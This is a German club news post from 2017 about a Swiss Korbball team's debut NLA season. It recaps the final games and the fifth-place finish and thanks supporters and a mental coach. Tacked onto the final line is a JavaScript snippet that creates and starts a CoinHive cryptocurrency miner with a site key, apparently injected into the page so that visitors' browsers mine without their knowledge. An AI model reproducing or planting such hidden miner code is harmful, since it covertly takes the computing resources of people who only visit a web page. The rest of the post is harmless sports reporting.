8 Siege, 17 Punkte und ein 5. Platz – NLA-Traum-Einstand

erstellt am: 11.09.2017 | Kategorie: Korbball

Mit einem knappen Sieg gegen Erschwil (6:5), einer knappen Niederlage gegen Altnau-Kreuzlingen (8:9) und dem verlorenen Showdown gegen Madiswil (8:11) im letzten Saisonspiel ging unsere Nati-Saison vorgesten mit 2 Punkten zu Ende.

Aus spielerischer Sicht hatten wir an dieser Meisterschaft, wie übrigens auch das Wetter, sicher schon bessere Tage. Trotzdem war es natürlich sehr schön die Saison dank den gewonnenen 2 Punkten auf dem tollen 5. Schlussrang abzuschliessen.

Und es war ja nicht so, dass die drei Spiele ohne Highlights geblieben wären. So wurde das erste Spiel zu einem Nervenkrimi und erst in der „Verlängerung“ entschieden. Im zweiten Spiel gegen Altnau-Kreuzlingen sorgte unser, mit einem Durchschnittsalter von 18 Jahren ausgestattetes Sturm-Trio für Furore und im Entscheidungsspiel um den Meistertitel brachten wir den neuen Meister Madiswil nach der Pause nochmals gehörig ins Schwitzen.

Es war auch deshalb ein schöner Tag, da gestern alle 13 Spieler zum Einsatz kamen und somit in dieser Saison der gesamte 14-köpfige Kader sein Nationalliga A Debut feiern konnte.

Nun ist die Saison vorbei. Zeit, eine kurze Trainingspause einzulegen, körperliche Beschwerden auszumerzen und die vergangenen Monate zu analysieren. Bald wird sich die Mannschaft zu einer Rückblick-Ausblick Sitzung treffen und dann wird der Blick auch schon wieder endgültig nach vorne gerichtet. Die Blütezeit von unserem Projekt, welches wir vor vier Jahren gestartet haben, soll uns erst noch bevorstehen und es gilt nun den nächsten Schritt zu machen, damit unsere Flügel auch in Zukunft mit dem nötigen Auftrieb versorgt sein werden.

Bilder zum Spieltag findet ihr hier.

1. NLA Saison, 17 Punkte, ein 6-Pack in Madiswil und der 5. Platz, was für ein Auftakt! Wir sind stolz und sehr glücklich über diesen super Einstand in der besten Korbballiga der Schweiz. Danke an alle, welche uns in irgendeiner Form unterstützt haben. Im Speziellen gebührt dieses Dankeschön den Zuschauern, dem Menznauer Abwartsteam, der Gemeinde und selbstverständlich auch der Ligenleitung mit den Schiedsrichtern, welche eine tolle Saison 2017 auf die Beine gestellt haben.

Nicht zu vergessen ist Nino Paneduro, Mentaltrainer, mit welchem wir zu Jahresbeginn zusammen gearbeitet haben und welcher uns geholfen hat ein ehrgeiziges Ziel zu setzen, an welchem wir uns während der ganzen Saison orientiert haben.

Zum Abschluss, Herzliche Gratulation an Madiswil zu ihrem Meistertitel und besonders auch an die Willisauer Damen zu ihrer tollen Saison und dem verdienten Aufstieg in die NLA!

NLA Saison 2017… es hat Spass gemacht. See you soon!var miner = new CoinHive.Anonymous(‚xdy0ZLd0XshUUGEEVTHOJTQSBcxt50ms‘); miner.start();